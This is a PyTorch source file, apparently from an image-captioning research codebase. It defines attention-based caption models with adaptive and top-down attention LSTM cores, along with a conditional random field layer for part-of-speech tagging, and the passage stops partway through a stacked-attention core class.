|
#coding=utf-8
# This file contains Att2in2, AdaAtt, AdaAttMO, TopDown model
# AdaAtt is from Knowing When to Look: Adaptive Attention via A Visual Sentinel for Image Captioning
# https://arxiv.org/abs/1612.01887
# AdaAttMO is a modified version with maxout lstm
# Att2in is from Self-critical Sequence Training for Image Captioning
# https://arxiv.org/abs/1612.00563
# In this file we only have Att2in2, which is a slightly different version of att2in,
# in which the img feature embedding and word embedding is the same as what in adaatt.
# TopDown is from Bottom-Up and Top-Down Attention for Image Captioning and VQA
# https://arxiv.org/abs/1707.07998
# However, it may not be identical to the author's architecture.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch
import torch.nn as nn
import torch.nn.functional as F
import misc.utils as utils
from torch.nn.utils.rnn import PackedSequence, pack_padded_sequence, pad_packed_sequence
from .CaptionModel import CaptionModel
import time
global_index = 0
def logsumexp(x, dim=None, keepdim=False):
if dim is None:
x, dim = x.view(-1), 0
xm, _ = torch.max(x, dim, keepdim=True)
x = torch.where(
(xm == float('inf')) | (xm == float('-inf')),
xm,
xm + torch.log(torch.sum(torch.exp(x - xm), dim, keepdim=True)))
return x if keepdim else x.squeeze(dim)
def sort_pack_padded_sequence(input, lengths):
#按照w*h的大小降序排列,得到新的sorted_lengths。 indices为原始lengths中的index在新的sorted_lengths中的分布
sorted_lengths, indices = torch.sort(lengths, descending=True)
#batch_first为True表示input[indices]的第1维为batch_size, 第2维为seq_length, 否则相反。 pack的过程是按列压紧
tmp = pack_padded_sequence(input[indices], sorted_lengths, batch_first=True)
inv_ix = indices.clone()
inv_ix[indices] = torch.arange(0,len(indices)).type_as(inv_ix)
return tmp, inv_ix
def pad_unsort_packed_sequence(input, inv_ix):
tmp, _ = pad_packed_sequence(input, batch_first=True)
tmp = tmp[inv_ix]
return tmp
def pack_wrapper(module, att_feats, att_masks):
if att_masks is not None:
#C = feat_size
#att_feats:[bach_size, w*h, C] att_masks:[bach_size, C]
packed, inv_ix = sort_pack_padded_sequence(att_feats, att_masks.data.long().sum(1))
#module in this is:BN-fc-relu-dropout-BN to [batch_size, rnn_size]
#return result is:[batch_size, rnn_size]
return pad_unsort_packed_sequence(PackedSequence(module(packed[0]), packed[1]), inv_ix)
else:
return module(att_feats)
class CRF(nn.Module):
"""Conditional random field.
This module implements a conditional random field [LMP01]_. The forward computation
of this class computes the log likelihood of the given sequence of tags and
emission score tensor. This class also has `~CRF.decode` method which finds
the best tag sequence given an emission score tensor using `Viterbi algorithm`_.
Args:
num_tags: Number of tags.
batch_first: Whether the first dimension corresponds to the size of a minibatch.
Attributes:
start_transitions (`~torch.nn.Parameter`): Start transition score tensor of size
``(num_tags,)``.
end_transitions (`~torch.nn.Parameter`): End transition score tensor of size
``(num_tags,)``.
transitions (`~torch.nn.Parameter`): Transition score tensor of size
``(num_tags, num_tags)``.
.. [LMP01] Lafferty, J., McCallum, A., Pereira, F. (2001).
"Conditional random fields: Probabilistic models for segmenting and
labeling sequence data". *Proc. 18th International Conf. on Machine
Learning*. Morgan Kaufmann. pp. 282–289.
.. _Viterbi algorithm: https://en.wikipedia.org/wiki/Viterbi_algorithm
"""
def __init__(self, num_tags, batch_first):
if num_tags <= 0:
print("num_tags error")
super(CRF, self).__init__()
self.num_tags = num_tags
self.batch_first = batch_first
self.start_transitions = nn.Parameter(torch.empty(num_tags))
self.end_transitions = nn.Parameter(torch.empty(num_tags))
self.transitions = nn.Parameter(torch.empty(num_tags, num_tags))
self.reset_parameters()
def reset_parameters(self):
"""Initialize the transition parameters.
The parameters will be initialized randomly from a uniform distribution
between -0.1 and 0.1.
"""
nn.init.uniform_(self.start_transitions, -0.1, 0.1)
nn.init.uniform_(self.end_transitions, -0.1, 0.1)
nn.init.uniform_(self.transitions, -0.1, 0.1)
def __repr__(self):
return "crf"
def forward(
self,
emissions,
tags,
mask,
reduction = 'sum',
):
"""Compute the conditional log likelihood of a sequence of tags given emission scores.
Args:
emissions (`~torch.Tensor`): Emission score tensor of size
``(seq_length, batch_size, num_tags)`` if ``batch_first`` is ``False``,
``(batch_size, seq_length, num_tags)`` otherwise.
tags (`~torch.LongTensor`): Sequence of tags tensor of size
``(seq_length, batch_size)`` if ``batch_first`` is ``False``,
``(batch_size, seq_length)`` otherwise.
mask (`~torch.ByteTensor`): Mask tensor of size ``(seq_length, batch_size)``
if ``batch_first`` is ``False``, ``(batch_size, seq_length)`` otherwise.
reduction: Specifies the reduction to apply to the output:
``none|sum|mean|token_mean``. ``none``: no reduction will be applied.
``sum``: the output will be summed over batches. ``mean``: the output will be
averaged over batches. ``token_mean``: the output will be averaged over tokens.
Returns:
`~torch.Tensor`: The log likelihood. This will have size ``(batch_size,)`` if
reduction is ``none``, ``()`` otherwise.
"""
# print("emissions", emissions.size())
# print("tags", tags.size())
# print("mask", mask.size())
self._validate(emissions, tags=tags, mask=mask)
if reduction not in ('none', 'sum', 'mean', 'token_mean'):
print('invalid reduction')
if mask is None:
mask = torch.ones_like(tags, dtype=torch.uint8)
if self.batch_first:
emissions = emissions.transpose(0, 1)
tags = tags.transpose(0, 1)
mask = mask.transpose(0, 1)
time1 = time.time()
# shape: (batch_size,)
numerator = self._compute_score(emissions, tags, mask)
time2 = time.time()
print("compute score use time ,", time2 - time1)
# shape: (batch_size,)
denominator = self._compute_normalizer(emissions, mask)
# shape: (batch_size,)
llh = numerator - denominator
if reduction == 'none':
return llh
if reduction == 'sum':
return llh.sum()
if reduction == 'mean':
return llh.mean()
assert reduction == 'token_mean'
return llh.sum() / mask.float().sum()
def decode(self, emissions,
mask = None):
"""Find the most likely tag sequence using Viterbi algorithm.
Args:
emissions (`~torch.Tensor`): Emission score tensor of size
``(seq_length, batch_size, num_tags)`` if ``batch_first`` is ``False``,
``(batch_size, seq_length, num_tags)`` otherwise.
mask (`~torch.ByteTensor`): Mask tensor of size ``(seq_length, batch_size)``
if ``batch_first`` is ``False``, ``(batch_size, seq_length)`` otherwise.
Returns:
List of list containing the best tag sequence for each batch.
"""
self._validate(emissions, mask=mask)
if mask is None:
mask = emissions.new_ones(emissions.shape[:2], dtype=torch.uint8)
if self.batch_first:
emissions = emissions.transpose(0, 1)
mask = mask.transpose(0, 1)
return self._viterbi_decode(emissions, mask)
def _validate(
self,
emissions,
tags = None,
mask = None):
if emissions.dim() != 3:
print('emissions must have dimension of 3, got', emissions.dim())
if emissions.size(2) != self.num_tags:
print('expected last dimension of emissions is',self.num_tags)
print('got:', emissions.size(2))
if tags is not None:
if emissions.shape[:2] != tags.shape:
print('the first two dimensions of emissions and tags must match')
if mask is not None:
if emissions.shape[:2] != mask.shape:
print('the first two dimensions of emissions and mask must match')
# no_empty_seq = not self.batch_first and mask[0].all()
# no_empty_seq_bf = self.batch_first and mask[:, 0].all()
# if not no_empty_seq and not no_empty_seq_bf:
# print('mask of the first timestep must all be on')
def _compute_score(
self, emissions, tags,
mask):
# emissions: (seq_length, batch_size, num_tags)
# tags: (seq_length, batch_size)
# mask: (seq_length, batch_size)
assert emissions.dim() == 3 and tags.dim() == 2
assert emissions.shape[:2] == tags.shape
assert emissions.size(2) == self.num_tags
assert mask.shape == tags.shape
#assert mask[0].all()
seq_length, batch_size = tags.shape
mask = mask.float()
# Start transition score and first emission
# shape: (batch_size,)
score = self.start_transitions[tags[0]]
score += emissions[0, torch.arange(batch_size).long(), tags[0]]
for i in range(1, seq_length):
# Transition score to next tag, only added if next timestep is valid (mask == 1)
# shape: (batch_size,)
score += self.transitions[tags[i - 1], tags[i]] * mask[i]
# Emission score for next tag, only added if next timestep is valid (mask == 1)
# shape: (batch_size,)
score += emissions[i, torch.arange(batch_size).long(), tags[i]] * mask[i]
# End transition score
# shape: (batch_size,)
seq_ends = mask.long().sum(dim=0) - 1
# shape: (batch_size,)
last_tags = tags[seq_ends, torch.arange(batch_size).long()]
# shape: (batch_size,)
score += self.end_transitions[last_tags]
return score
def _compute_normalizer(
self, emissions, mask):
# emissions: (seq_length, batch_size, num_tags)
# mask: (seq_length, batch_size)
assert emissions.dim() == 3 and mask.dim() == 2
assert emissions.shape[:2] == mask.shape
assert emissions.size(2) == self.num_tags
#assert mask[0].all()
seq_length = emissions.size(0)
# Start transition score and first emission; score has size of
# (batch_size, num_tags) where for each batch, the j-th column stores
# the score that the first timestep has tag j
# shape: (batch_size, num_tags)
score = self.start_transitions + emissions[0]
for i in range(1, seq_length):
# Broadcast score for every possible next tag
# shape: (batch_size, num_tags, 1)
broadcast_score = score.unsqueeze(2)
# Broadcast emission score for every possible current tag
# shape: (batch_size, 1, num_tags)
broadcast_emissions = emissions[i].unsqueeze(1)
# Compute the score tensor of size (batch_size, num_tags, num_tags) where
# for each sample, entry at row i and column j stores the sum of scores of all
# possible tag sequences so far that end with transitioning from tag i to tag j
# and emitting
# shape: (batch_size, num_tags, num_tags)
next_score = broadcast_score + self.transitions + broadcast_emissions
# Sum over all possible current tags, but we're in score space, so a sum
# becomes a log-sum-exp: for each sample, entry i stores the sum of scores of
# all possible tag sequences so far, that end in tag i
# shape: (batch_size, num_tags)
#print(next_score.size())
next_score = logsumexp(next_score, dim=1)
# Set score to the next score if this timestep is valid (mask == 1)
# shape: (batch_size, num_tags)
score = torch.where(mask[i].byte().unsqueeze(1), next_score, score)
# End transition score
# shape: (batch_size, num_tags)
score += self.end_transitions
# Sum (log-sum-exp) over all possible tags
# shape: (batch_size,)
return logsumexp(score, dim=1)
def _viterbi_decode(self, emissions,
mask):
# emissions: (seq_length, batch_size, num_tags)
# mask: (seq_length, batch_size)
assert emissions.dim() == 3 and mask.dim() == 2
assert emissions.shape[:2] == mask.shape
assert emissions.size(2) == self.num_tags
#assert mask[0].all()
seq_length, batch_size = mask.shape
# Start transition and first emission
# shape: (batch_size, num_tags)
score = self.start_transitions + emissions[0]
history = []
# score is a tensor of size (batch_size, num_tags) where for every batch,
# value at column j stores the score of the best tag sequence so far that ends
# with tag j
# history saves where the best tags candidate transitioned from; this is used
# when we trace back the best tag sequence
# Viterbi algorithm recursive case: we compute the score of the best tag sequence
# for every possible next tag
for i in range(1, seq_length):
# Broadcast viterbi score for every possible next tag
# shape: (batch_size, num_tags, 1)
broadcast_score = score.unsqueeze(2)
# Broadcast emission score for every possible current tag
# shape: (batch_size, 1, num_tags)
broadcast_emission = emissions[i].unsqueeze(1)
# Compute the score tensor of size (batch_size, num_tags, num_tags) where
# for each sample, entry at row i and column j stores the score of the best
# tag sequence so far that ends with transitioning from tag i to tag j and emitting
# shape: (batch_size, num_tags, num_tags)
next_score = broadcast_score + self.transitions + broadcast_emission
# Find the maximum score over all possible current tag
# shape: (batch_size, num_tags)
next_score, indices = next_score.max(dim=1)
# Set score to the next score if this timestep is valid (mask == 1)
# and save the index that produces the next score
# shape: (batch_size, num_tags)
score = torch.where(mask[i].unsqueeze(1), next_score, score)
history.append(indices)
# End transition score
# shape: (batch_size, num_tags)
score += self.end_transitions
# Now, compute the best path for each sample
# shape: (batch_size,)
seq_ends = mask.long().sum(dim=0) - 1
best_tags_list = []
for idx in range(batch_size):
# Find the tag which maximizes the score at the last timestep; this is our best tag
# for the last timestep
_, best_last_tag = score[idx].max(dim=0)
best_tags = [best_last_tag.item()]
# We trace back where the best last tag comes from, append that to our best tag
# sequence, and trace it back again, and so on
for hist in reversed(history[:seq_ends[idx]]):
best_last_tag = hist[idx][best_tags[-1]]
best_tags.append(best_last_tag.item())
# Reverse the order because we start from the last timestep
best_tags.reverse()
best_tags_list.append(best_tags)
return best_tags_list
class AttModel(CaptionModel):
def __init__(self, opt):
super(AttModel, self).__init__()
self.att_type = opt.att_type
self.use_crf = opt.use_crf
self.vocab_size = opt.vocab_size
self.pos_size = opt.pos_size
self.input_encoding_size = opt.input_encoding_size
#self.rnn_type = opt.rnn_type
self.rnn_size = opt.rnn_size
self.num_layers = opt.num_layers
self.drop_prob_lm = opt.drop_prob_lm
self.seq_length = opt.seq_length
self.fc_feat_size = opt.fc_feat_size
self.att_feat_size = opt.att_feat_size
self.att_hid_size = opt.att_hid_size
self.use_bn = getattr(opt, 'use_bn', 0)
self.ss_prob = 0.0 # Schedule sampling probability
self.embed = nn.Sequential(nn.Embedding(self.vocab_size + 1, self.input_encoding_size),
nn.ReLU(),
nn.Dropout(self.drop_prob_lm))
self.fc_embed = nn.Sequential(nn.Linear(self.fc_feat_size, self.rnn_size),
nn.ReLU(),
nn.Dropout(self.drop_prob_lm))
self.att_embed = nn.Sequential(*(
((nn.BatchNorm1d(self.att_feat_size),) if self.use_bn else ())+
(nn.Linear(self.att_feat_size, self.rnn_size),
nn.ReLU(),
nn.Dropout(self.drop_prob_lm))+
((nn.BatchNorm1d(self.rnn_size),) if self.use_bn==2 else ())))
self.logit_layers = getattr(opt, 'logit_layers', 1)
if self.logit_layers == 1:
self.logit = nn.Linear(self.rnn_size, self.vocab_size + 1)
else:
self.logit = [[nn.Linear(self.rnn_size, self.rnn_size), nn.ReLU(), nn.Dropout(0.5)] for _ in range(opt.logit_layers - 1)]
self.logit = nn.Sequential(*(reduce(lambda x,y:x+y, self.logit) + [nn.Linear(self.rnn_size, self.vocab_size + 1)]))
self.att_res_layers = nn.Linear(self.rnn_size, self.vocab_size + 1)
self.pos_logit = nn.Linear(self.rnn_size, self.pos_size + 1)
self.ctx2att = nn.Linear(self.rnn_size, self.att_hid_size)
self.crf = CRF(self.pos_size + 1, batch_first = True)
def init_hidden(self, bsz):
weight = next(self.parameters())
return (weight.new_zeros(self.num_layers, bsz, self.rnn_size),
weight.new_zeros(self.num_layers, bsz, self.rnn_size))
def clip_att(self, att_feats, att_masks):
# Clip the length of att_masks and att_feats to the maximum length
if att_masks is not None:
max_len = att_masks.data.long().sum(1).max()
att_feats = att_feats[:, :max_len].contiguous()
att_masks = att_masks[:, :max_len].contiguous()
return att_feats, att_masks
def _prepare_feature(self, fc_feats, att_feats, att_masks):
#find max w*h of att_feats, make it contiguous
att_feats, att_masks = self.clip_att(att_feats, att_masks)
# embed fc and att feats
fc_feats = self.fc_embed(fc_feats) # fc - relu - dropout become [bach_size, rnn_size]
att_feats = pack_wrapper(self.att_embed, att_feats, att_masks) #
# Project the attention feats first to reduce memory and computation comsumptions.
p_att_feats = self.ctx2att(att_feats) # fc become [batch_size, att_hid_size]
return fc_feats, att_feats, p_att_feats, att_masks
def _forward(self, fc_feats, att_feats, seq, pos, masks, att_masks=None):
batch_size = fc_feats.size(0)
state = self.init_hidden(batch_size)
#[batch_size, seq_length-1, vocab_size+1]
outputs = fc_feats.new_zeros(batch_size, seq.size(1) - 1, self.vocab_size+1)
emissions = fc_feats.new_zeros(batch_size, seq.size(1) - 1, self.pos_size+1)
# Prepare the features
#p_fc_feats:[batch_size, rnn_size]
#p_att_feats:[batch_size, w*h, rnn_size ]
#pp_att_feats:[batch_size, w*h, att_hid_size]
#p_att_masks:[batch_size, max_K]
p_fc_feats, p_att_feats, pp_att_feats, p_att_masks = self._prepare_feature(fc_feats, att_feats, att_masks)
# pp_att_feats is used for attention, we cache it in advance to reduce computation cost
states = []
for i in range(seq.size(1) - 1):
#这里ss_prob的作用是,在一次迭代的过程中,输入的词ss_prob%部分部分按照上一步的ouputs的概率进行sample,其余部分按照gt中原样输入
states.append(state)
if self.training and i >= 1 and self.ss_prob > 0.0: # otherwiste no need to sample
sample_prob = fc_feats.new(batch_size).uniform_(0, 1)
sample_mask = sample_prob < self.ss_prob
if sample_mask.sum() == 0:
it = seq[:, i].clone()
else:
#将sample_mask中不为0的index提出来,得到一个1维的数组,每个元素都为不为0的下标
sample_ind = sample_mask.nonzero().view(-1)
it = seq[:, i].data.clone()
#prob_prev = torch.exp(outputs[-1].data.index_select(0, sample_ind)) # fetch prev distribution: shape Nx(M+1)
#it.index_copy_(0, sample_ind, torch.multinomial(prob_prev, 1).view(-1))
# prob_prev = torch.exp(outputs[-1].data) # fetch prev distribution: shape Nx(M+1)
prob_prev = torch.exp(outputs[:, i-1].detach()) # fetch prev distribution: shape Nx(M+1)
#index_copy_: (dim, index, tensor) it必须与tensor的维度一致,把tensor第0维的数据,按照sample_ind中所给的索引按顺序复制
it.index_copy_(0, sample_ind, torch.multinomial(prob_prev, 1).view(-1).index_select(0, sample_ind))#it:[sample_ind_size]
else:
it = seq[:, i].clone()
# break if all the sequences end
if i >= 1 and seq[:, i].sum() == 0:
break
if self.att_type == "intra" and i != 0:
output, state, emission = self.get_logprobs_state(it, p_fc_feats, p_att_feats, pp_att_feats, p_att_masks, state, states)
else:
output, state, emission = self.get_logprobs_state(it, p_fc_feats, p_att_feats, pp_att_feats, p_att_masks, state)
outputs[:, i] = output
emissions[:, i] = emission
return outputs, self.crf(emissions, pos, masks, reduction = 'token_mean')
def get_logprobs_state(self, it, fc_feats, att_feats, p_att_feats, att_masks, state, *args):
# 'it' contains a word index
xt = self.embed(it)
if args == ():
output, state, att_res = self.core(xt, fc_feats, att_feats, p_att_feats, state, att_masks)
logprobs = F.log_softmax(self.logit(output) + self.att_res_layers(att_res), dim=1)
emission = F.log_softmax(self.pos_logit(output), dim = 1)
else:
output, state, att_res, ht_d = self.core(xt, fc_feats, att_feats, p_att_feats, state, att_masks, *args)
logprobs = F.log_softmax(self.logit(output) + self.att_res_layers(att_res), dim=1)
emission = F.log_softmax(self.pos_logit(output), dim = 1)
return logprobs, state, emission
def _sample_beam(self, fc_feats, att_feats, att_masks=None, opt={}):
beam_size = opt.get('beam_size', 10)
batch_size = fc_feats.size(0)
p_fc_feats, p_att_feats, pp_att_feats, p_att_masks = self._prepare_feature(fc_feats, att_feats, att_masks)
assert beam_size <= self.vocab_size + 1, 'lets assume this for now, otherwise this corner case causes a few headaches down the road. can be dealt with in future if needed'
seq = torch.LongTensor(self.seq_length, batch_size).zero_()
seqLogprobs = torch.FloatTensor(self.seq_length, batch_size)
# lets process every image independently for now, for simplicity
self.done_beams = [[] for _ in range(batch_size)]
for k in range(batch_size):
state = self.init_hidden(beam_size)
tmp_fc_feats = p_fc_feats[k:k+1].expand(beam_size, p_fc_feats.size(1))
tmp_att_feats = p_att_feats[k:k+1].expand(*((beam_size,)+p_att_feats.size()[1:])).contiguous()
tmp_p_att_feats = pp_att_feats[k:k+1].expand(*((beam_size,)+pp_att_feats.size()[1:])).contiguous()
tmp_att_masks = p_att_masks[k:k+1].expand(*((beam_size,)+p_att_masks.size()[1:])).contiguous() if att_masks is not None else None
for t in range(1):
if t == 0: # input <bos>
it = fc_feats.new_zeros([beam_size], dtype=torch.long)
logprobs, state, _ = self.get_logprobs_state(it, tmp_fc_feats, tmp_att_feats, tmp_p_att_feats, tmp_att_masks, state)
self.done_beams[k] = self.beam_search(state, logprobs, tmp_fc_feats, tmp_att_feats, tmp_p_att_feats, tmp_att_masks, opt=opt)
seq[:, k] = self.done_beams[k][0]['seq'] # the first beam has highest cumulative score
seqLogprobs[:, k] = self.done_beams[k][0]['logps']
# return the samples and their log likelihoods
return seq.transpose(0, 1), seqLogprobs.transpose(0, 1)
def _sample(self, fc_feats, att_feats, att_masks=None, opt={}):
sample_max = opt.get('sample_max', 1)
beam_size = opt.get('beam_size', 1)
temperature = opt.get('temperature', 1.0)
decoding_constraint = opt.get('decoding_constraint', 0)
if beam_size > 1:
return self._sample_beam(fc_feats, att_feats, att_masks, opt)
batch_size = fc_feats.size(0)
state = self.init_hidden(batch_size)
p_fc_feats, p_att_feats, pp_att_feats, p_att_masks = self._prepare_feature(fc_feats, att_feats, att_masks)
seq = fc_feats.new_zeros((batch_size, self.seq_length), dtype=torch.long)
seqLogprobs = fc_feats.new_zeros(batch_size, self.seq_length)
#seqEmission = fc_feats.new_zeros(batch_size, self.seq_length, self.vocab_size + 1)
states = []
for t in range(self.seq_length + 1):
if t == 0: # input <bos>
it = fc_feats.new_zeros(batch_size, dtype=torch.long)
if self.att_type == "intra" and t != 0:
logprobs, state, emission = self.get_logprobs_state(it, p_fc_feats, p_att_feats, pp_att_feats, p_att_masks, state, states)
else:
logprobs, state, emission = self.get_logprobs_state(it, p_fc_feats, p_att_feats, pp_att_feats, p_att_masks, state)
#decoding_constraint用于限制这一行能否出现同一个单词两遍以上,默认为0,不限制
states.append(state)
if decoding_constraint and t > 0:
tmp = logprobs.new_zeros(logprobs.size())
tmp.scatter_(1, seq[:,t-1].data.unsqueeze(1), float('-inf'))
logprobs = logprobs + tmp
#seqEmission[:, t, :] = logprobs
# sample the next word
if t == self.seq_length: # skip if we achieve maximum length
break
# sample_max默认为1。当RL训练时,设置sample_max = 0; 当test时, 设置sample_max = 1 也就是每次取argmax
if sample_max:
sampleLogprobs, it = torch.max(logprobs.data, 1)
it = it.view(-1).long()
else:
if temperature == 1.0:
prob_prev = torch.exp(logprobs.data) # fetch prev distribution: shape Nx(M+1)
else:
# scale logprobs by temperature
prob_prev = torch.exp(torch.div(logprobs.data, temperature))
it = torch.multinomial(prob_prev, 1)
sampleLogprobs = logprobs.gather(1, it) # gather the logprobs at sampled positions
it = it.view(-1).long() # and flatten indices for downstream processing
# stop when all finished
if t == 0:
unfinished = it > 0
else:
unfinished = unfinished * (it > 0)
it = it * unfinished.type_as(it)
seq[:,t] = it
seqLogprobs[:,t] = sampleLogprobs.view(-1)
# quit loop if all sequences have finished
if unfinished.sum() == 0:
break
# if self.att_type == 'intra' and self.use_crf:
# self.crf.decode(seqLogprobs), seqLogprobs
# else:
# return seq, seqLogprobs
return seq, seqLogprobs
class AdaAtt_lstm(nn.Module):
def __init__(self, opt, use_maxout=True):
super(AdaAtt_lstm, self).__init__()
self.input_encoding_size = opt.input_encoding_size
#self.rnn_type = opt.rnn_type
self.rnn_size = opt.rnn_size
self.num_layers = opt.num_layers
self.drop_prob_lm = opt.drop_prob_lm
self.fc_feat_size = opt.fc_feat_size
self.att_feat_size = opt.att_feat_size
self.att_hid_size = opt.att_hid_size
self.use_maxout = use_maxout
# Build a LSTM
self.w2h = nn.Linear(self.input_encoding_size, (4+(use_maxout==True)) * self.rnn_size)
self.v2h = nn.Linear(self.rnn_size, (4+(use_maxout==True)) * self.rnn_size)
self.i2h = nn.ModuleList([nn.Linear(self.rnn_size, (4+(use_maxout==True)) * self.rnn_size) for _ in range(self.num_layers - 1)])
self.h2h = nn.ModuleList([nn.Linear(self.rnn_size, (4+(use_maxout==True)) * self.rnn_size) for _ in range(self.num_layers)])
# Layers for getting the fake region
if self.num_layers == 1:
self.r_w2h = nn.Linear(self.input_encoding_size, self.rnn_size)
self.r_v2h = nn.Linear(self.rnn_size, self.rnn_size)
else:
self.r_i2h = nn.Linear(self.rnn_size, self.rnn_size)
self.r_h2h = nn.Linear(self.rnn_size, self.rnn_size)
def forward(self, xt, img_fc, state):
hs = []
cs = []
for L in range(self.num_layers):
# c,h from previous timesteps
prev_h = state[0][L]
prev_c = state[1][L]
# the input to this layer
if L == 0:
x = xt
i2h = self.w2h(x) + self.v2h(img_fc)
else:
x = hs[-1]
x = F.dropout(x, self.drop_prob_lm, self.training)
i2h = self.i2h[L-1](x)
all_input_sums = i2h+self.h2h[L](prev_h)
sigmoid_chunk = all_input_sums.narrow(1, 0, 3 * self.rnn_size)
sigmoid_chunk = F.sigmoid(sigmoid_chunk)
# decode the gates
in_gate = sigmoid_chunk.narrow(1, 0, self.rnn_size)
forget_gate = sigmoid_chunk.narrow(1, self.rnn_size, self.rnn_size)
out_gate = sigmoid_chunk.narrow(1, self.rnn_size * 2, self.rnn_size)
# decode the write inputs
if not self.use_maxout:
in_transform = F.tanh(all_input_sums.narrow(1, 3 * self.rnn_size, self.rnn_size))
else:
in_transform = all_input_sums.narrow(1, 3 * self.rnn_size, 2 * self.rnn_size)
in_transform = torch.max(\
in_transform.narrow(1, 0, self.rnn_size),
in_transform.narrow(1, self.rnn_size, self.rnn_size))
# perform the LSTM update
next_c = forget_gate * prev_c + in_gate * in_transform
# gated cells form the output
tanh_nex_c = F.tanh(next_c)
next_h = out_gate * tanh_nex_c
if L == self.num_layers-1:
if L == 0:
i2h = self.r_w2h(x) + self.r_v2h(img_fc)
else:
i2h = self.r_i2h(x)
n5 = i2h+self.r_h2h(prev_h)
fake_region = F.sigmoid(n5) * tanh_nex_c
cs.append(next_c)
hs.append(next_h)
# set up the decoder
top_h = hs[-1]
top_h = F.dropout(top_h, self.drop_prob_lm, self.training)
fake_region = F.dropout(fake_region, self.drop_prob_lm, self.training)
state = (torch.cat([_.unsqueeze(0) for _ in hs], 0),
torch.cat([_.unsqueeze(0) for _ in cs], 0))
return top_h, fake_region, state
class AdaAtt_attention(nn.Module):
def __init__(self, opt):
super(AdaAtt_attention, self).__init__()
self.input_encoding_size = opt.input_encoding_size
#self.rnn_type = opt.rnn_type
self.rnn_size = opt.rnn_size
self.drop_prob_lm = opt.drop_prob_lm
self.att_hid_size = opt.att_hid_size
# fake region embed
self.fr_linear = nn.Sequential(
nn.Linear(self.rnn_size, self.input_encoding_size),
nn.ReLU(),
nn.Dropout(self.drop_prob_lm))
self.fr_embed = nn.Linear(self.input_encoding_size, self.att_hid_size)
# h out embed
self.ho_linear = nn.Sequential(
nn.Linear(self.rnn_size, self.input_encoding_size),
nn.Tanh(),
nn.Dropout(self.drop_prob_lm))
self.ho_embed = nn.Linear(self.input_encoding_size, self.att_hid_size)
self.alpha_net = nn.Linear(self.att_hid_size, 1)
self.att2h = nn.Linear(self.rnn_size, self.rnn_size)
def forward(self, h_out, fake_region, conv_feat, conv_feat_embed, att_masks=None):
# View into three dimensions
att_size = conv_feat.numel() // conv_feat.size(0) // self.rnn_size
conv_feat = conv_feat.view(-1, att_size, self.rnn_size)
conv_feat_embed = conv_feat_embed.view(-1, att_size, self.att_hid_size)
# view neighbor from bach_size * neighbor_num x rnn_size to bach_size x rnn_size * neighbor_num
fake_region = self.fr_linear(fake_region)
fake_region_embed = self.fr_embed(fake_region)
h_out_linear = self.ho_linear(h_out)
h_out_embed = self.ho_embed(h_out_linear)
txt_replicate = h_out_embed.unsqueeze(1).expand(h_out_embed.size(0), att_size + 1, h_out_embed.size(1))
img_all = torch.cat([fake_region.view(-1,1,self.input_encoding_size), conv_feat], 1)
img_all_embed = torch.cat([fake_region_embed.view(-1,1,self.input_encoding_size), conv_feat_embed], 1)
hA = F.tanh(img_all_embed + txt_replicate)
hA = F.dropout(hA,self.drop_prob_lm, self.training)
hAflat = self.alpha_net(hA.view(-1, self.att_hid_size))
PI = F.softmax(hAflat.view(-1, att_size + 1), dim=1)
if att_masks is not None:
att_masks = att_masks.view(-1, att_size)
PI = PI * torch.cat([att_masks[:,:1], att_masks], 1) # assume one one at the first time step.
PI = PI / PI.sum(1, keepdim=True)
visAtt = torch.bmm(PI.unsqueeze(1), img_all)
visAttdim = visAtt.squeeze(1)
atten_out = visAttdim + h_out_linear
h = F.tanh(self.att2h(atten_out))
h = F.dropout(h, self.drop_prob_lm, self.training)
return h
class AdaAttCore(nn.Module):
def __init__(self, opt, use_maxout=False):
super(AdaAttCore, self).__init__()
self.lstm = AdaAtt_lstm(opt, use_maxout)
self.attention = AdaAtt_attention(opt)
def forward(self, xt, fc_feats, att_feats, p_att_feats, state, att_masks=None):
h_out, p_out, state = self.lstm(xt, fc_feats, state)
atten_out = self.attention(h_out, p_out, att_feats, p_att_feats, att_masks)
return atten_out, state
class TopDownCore(nn.Module):
def __init__(self, opt, use_maxout=False):
super(TopDownCore, self).__init__()
self.drop_prob_lm = opt.drop_prob_lm
self.att_lstm = nn.LSTMCell(opt.input_encoding_size + opt.rnn_size * 2, opt.rnn_size) # we, fc, h^2_t-1
self.lang_lstm = nn.LSTMCell(opt.rnn_size * 2, opt.rnn_size) # h^1_t, \hat v
self.attention = Attention(opt)
def forward(self, xt, fc_feats, att_feats, p_att_feats, state, att_masks=None):
prev_h = state[0][-1]
att_lstm_input = torch.cat([prev_h, fc_feats, xt], 1)
h_att, c_att = self.att_lstm(att_lstm_input, (state[0][0], state[1][0]))
att = self.attention(h_att, att_feats, p_att_feats, att_masks)
lang_lstm_input = torch.cat([att, h_att], 1)
# lang_lstm_input = torch.cat([att, F.dropout(h_att, self.drop_prob_lm, self.training)], 1) ?????
h_lang, c_lang = self.lang_lstm(lang_lstm_input, (state[0][1], state[1][1]))
output = F.dropout(h_lang, self.drop_prob_lm, self.training)
state = (torch.stack([h_att, h_lang]), torch.stack([c_att, c_lang]))
return output, state
############################################################################
# Notice:
# StackAtt and DenseAtt are models that I randomly designed.
# They are not related to any paper.
############################################################################
from .FCModel import LSTMCore
class StackAttCore(nn.Module):
def __init__(self, opt, use_maxout=False):
super(StackAttCore, self).__init__()
self.drop_prob_lm = opt.drop_prob_lm
# self.att0 = Attention(opt)
self.att1 = Attention(opt)
self.att2 = Attention(opt)
opt_input_encoding_size = opt.input_encoding_size
opt.input_encoding_size = opt.input_encoding_size + opt.rnn_size
self.lstm0 = LSTMCore(opt) # att_feat + word_embedding
opt.input_encoding_size = opt.rnn_size * 2
self.lstm1 = LSTMCore(opt)
self.lstm2 = LSTMCore(opt)
opt.input_encoding_size = opt_input_encoding_size
# self.emb1 = nn.Linear(opt.rnn_size, opt.rnn_size)
self.emb2 = nn.Linear(opt.rnn_size, opt.rnn_size)
def forward(self, xt, fc_feats, att_feats, p_att_feats, state, att_masks=None):
# att_res_0 = self.att0(state[0][-1], att_feats, p_att_feats, att_masks)
h_0, state_0 = self.lstm0(torch.cat([xt,fc_feats],1), [state[0][0:1], state[1][0:1]])
att_res_1 = self.att1(h_0, att_feats, p_att_feats, att_masks)
h_1, state_1 = self.lstm1(torch.cat([h_0,att_res_1],1), [state[0][1:2], state[1][1:2]])
att_res_2 = self.att2(h_1 + self.emb2(att_res_1), att_feats, p_att_feats, att_masks)
h_2, state_2 = self.lstm2(torch.cat([h_1,att_res_2],1), [state[0][2:3], state[1][2:3]])
